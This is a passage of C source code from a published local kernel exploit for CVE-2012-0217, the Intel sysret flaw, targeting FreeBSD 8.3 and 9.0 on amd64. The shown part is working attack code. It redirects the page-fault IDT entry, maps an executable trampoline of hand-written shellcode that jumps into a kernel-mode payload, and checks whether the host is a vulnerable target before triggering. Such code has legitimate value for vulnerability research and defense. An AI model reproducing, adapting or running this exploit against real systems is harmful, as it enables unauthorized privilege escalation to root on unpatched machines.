    // [2] writes 0 to tf_addr which is also 16byte aligned. So no dice.
    // That leaves us with [1] which writes T_PROTFLT (0x9) to tf_trapno
    // and tf_trapno is 16byte aligned + 8!
    // This enables us to set Target Offset[63:32] to 0x9
    //
    // We set rsp to &idt[14] + 10 * 8 (to align tf_trapno with Offset[63:32])
    *(uint64_t*)(trigger_addr + 10) = (uint64_t)(((uint8_t*)&sidt()[14]) + 10 * 8);
    // Hence, the #PF handler's address is now 0x9WWXXYYZZ
    // Furthermore, WWXXYYZZ is known since we can get (see get_symaddr()) the #PF's address
    // Thus, the idea is to setup a trampoline code at 0x9WWXXYYZZ which does
    // some setup and jump to our kernel mode code
    printf("    [+] Trampoline code...\n");
    char trampolinecode[] =
        "\x0f\x01\xf8" // swapgs; switch back to the kernel's GS.base
        "\x48\x89\xdc" // mov rsp, rbx; restore rsp, it's enough to use the user's stack
        "\x48\xb8\xbe\xba\xfe\xca\xde\xc0\xad\xde" // mov rax, 0xdeadc0decafebabe
        "\xff\xe0"; // jmp rax

    uint8_t * trampoline = (uint8_t*)(0x900000000 | (Xpage_ptr & 0xFFFFFFFF));
    size_t trampoline_allocsize = pagesize;
    // We round the address to the PAGESIZE for the allocation
    // Not enough space for the trampoline code ?
    if ((uint8_t*)((uint64_t)trampoline & ~(pagesize-1)) + pagesize < trampoline + TRAMPOLINECODESIZE)
        trampoline_allocsize += pagesize;
    if (mmap((void*)((uint64_t)trampoline & ~(pagesize-1)), trampoline_allocsize,
        PROT_READ | PROT_WRITE | PROT_EXEC,
        MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0) == MAP_FAILED)
    {
        perror("mmap (trampoline)");
        exit(1);
    }
    memcpy(trampoline, trampolinecode, TRAMPOLINECODESIZE);
    *(uint64_t*)(trampoline + 8) = (uint64_t)kernelmodepayload;
    // Call it
    printf("[*] Fire in the hole!\n");
    ((void (*)())trigger_addr)();
}

typedef struct validtarget
{
    char * sysname;
    char * release;
    char * machine;
} validtarget_t;

int validate_target(char * sysname, char * release, char * machine)
{
    validtarget_t targets[] = {
        { "FreeBSD", "8.3-RELEASE", "amd64" },
        { "FreeBSD", "9.0-RELEASE", "amd64" },
        { 0, 0, 0 }
    };

    int found = 0;
    int i = 0;

    while (!found && targets[i].sysname) {
        found = !strcmp(targets[i].sysname, sysname)
            && !strcmp(targets[i].release, release)
            && !strcmp(targets[i].machine, machine);
        ++i;
    }
    return found;
}

void get_cpu_vendor(char * cpu_vendor)
{
    u_int regs[4];

    do_cpuid(0, regs);
    ((u_int *)cpu_vendor)[0] = regs[1];
    ((u_int *)cpu_vendor)[1] = regs[3];
    ((u_int *)cpu_vendor)[2] = regs[2];
    cpu_vendor[12] = '\0';
}

int is_intel()
{
    char cpu_vendor[13];

    get_cpu_vendor(cpu_vendor);
    return !strcmp(cpu_vendor, "GenuineIntel");
}

int main(int argc, char *argv[])
{
    printf("CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)\n\n");

    printf("[*] Retrieving host information...\n");
    char cpu_vendor[13];
    get_cpu_vendor(cpu_vendor);
    struct utsname ver;
    uname(&ver);
    printf("    [+] CPU: %s\n", cpu_vendor);
    printf("    [+] sysname: %s\n", ver.sysname);
    printf("    [+] release: %s\n", ver.release);
    printf("    [+] version: %s\n", ver.version);
    printf("    [+] machine: %s\n", ver.machine);
    printf("[*] Validating target OS and version...\n");
    if (!is_intel() || !validate_target(ver.sysname, ver.release, ver.machine)) {
        printf("    [+] NOT Vulnerable :-(\n");
        exit(1);
    } else
        printf("    [+] Vulnerable :-)\n");
    // Prepare the values we'll need to restore the kernel to a stable state
    printf("[*] Resolving kernel addresses...\n");
    Xofl_ptr = (uintptr_t)get_symaddr("Xofl");
    Xbnd_ptr = (uintptr_t)get_symaddr("Xbnd");
    Xill_ptr = (uintptr_t)get_symaddr("Xill");
    Xdna_ptr = (uintptr_t)get_symaddr("Xdna");
    Xpage_ptr = (uintptr_t)get_symaddr("Xpage");
    Xfpu_ptr = (uintptr_t)get_symaddr("Xfpu");
    Xalign_ptr = (uintptr_t)get_symaddr("Xalign");
    Xmchk_ptr = (uintptr_t)get_symaddr("Xmchk");
    Xxmm_ptr = (uintptr_t)get_symaddr("Xxmm");
    // doeet!
    trigger();
    return 0;
}